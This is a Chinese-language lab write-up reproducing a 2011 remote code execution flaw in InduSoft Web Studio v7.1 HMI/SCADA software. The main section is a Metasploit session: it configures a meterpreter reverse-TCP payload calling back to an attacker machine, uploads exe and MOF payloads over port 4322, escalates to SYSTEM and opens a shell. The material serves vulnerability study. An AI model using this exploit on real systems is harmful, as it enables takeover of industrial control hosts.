嵌入式HMI软件-InduSoft Web Studio RCE漏洞复现
嵌入式HMI软件-InduSoft Web Studio RCE漏洞复现
1. 环境配置
1.1 环境准备
闲着没事来复现一个2011年的工控CVE漏洞,其实还是偏向于web.
再来熟悉一下HMI和SCADA吧
靶机:win xp (192.168.183.160)
攻击机器:kali(192.168.183.139)
工业软件及版本:InduSoft Web Studio v7.1
漏洞exp:https://www.exploit-db.com/exploits/21837
1.2 工业软件安装
安装地址:https://indusoft-web-studio.software.informer.com/7.1/
然后过程可参考:http://www.opdown.com/soft/92899.html
在靶机中安装InduSoft Web Studio v7.1工业软件,安装好后点击remote agent,然后点start
然后就来到了主页面
此人机界面继承了许多存在的工业场景,比如是由燃气采集
然后还有自动化机械臂
还有风能监测,并且还登记了操作系统和用户,作为十年前的软件做的确实可以
然后我们此时查看端口占用情况
同时可以看到4322端口已开启
1.3 子弹上膛
在kali攻击中,如下目录放入下载的exp模块
然后下载此攻击exp
此脚本在更新后的msf上是存在的,没有的安装一下
通过https://www.exploit-db.com/exploits/21837,获取漏洞exp,发现漏洞测试版本为InduSoft Web Studio v6.1 SP6,由于v6.1版本已经很难找到,本文尝试使用InduSoft Web Studio v7.1版本代替,亲测v7.1版本也是ok的
通过exp发现漏洞利用需要通过4322端口,故InduSoft Web Studio v7.1需要开启相应服务。
2. 漏洞复现
2.1 msf反弹shell
msf6 > use exploit/windows/scada/indusoft_webstudio_exec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/scada/indusoft_webstudio_exec) > options
Module options (exploit/windows/scada/indusoft_webstudio_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 4322 yes The target port (TCP)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.183.139 yes The listen address (an interface may be specified)
LPORT 7777 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows XP / 2003
msf6 exploit(windows/scada/indusoft_webstudio_exec) > run
[*] Started reverse TCP handler on 192.168.183.139:7777
[*] 192.168.183.160:4322 - 192.168.183.160:4322 - Uploading the exe payload to C:\WINDOWS\system32\cBlTPNrXsabYq.exe
[+] 192.168.183.160:4322 - 192.168.183.160:4322 - The exe payload has been uploaded successfully
[*] 192.168.183.160:4322 - 192.168.183.160:4322 - Uploading the mof file to c:\WINDOWS\system32\wbem\mof\LUivMnxSNqx.mof
[+] 192.168.183.160:4322 - 192.168.183.160:4322 - The mof file has been uploaded successfully
[*] Exploit completed, but no session was created.
这里需要开启一下,然后就可以进行提权操作了
输入shell就可以执行命令了,到这里提权成功
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 2204 created.
Channel 1 created.
Microsoft Windows XP [�汾 5.1.2600]
(C) ��Ȩ���� 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>参考链接:https://www.freebuf.com/articles/ics-articles/256862.html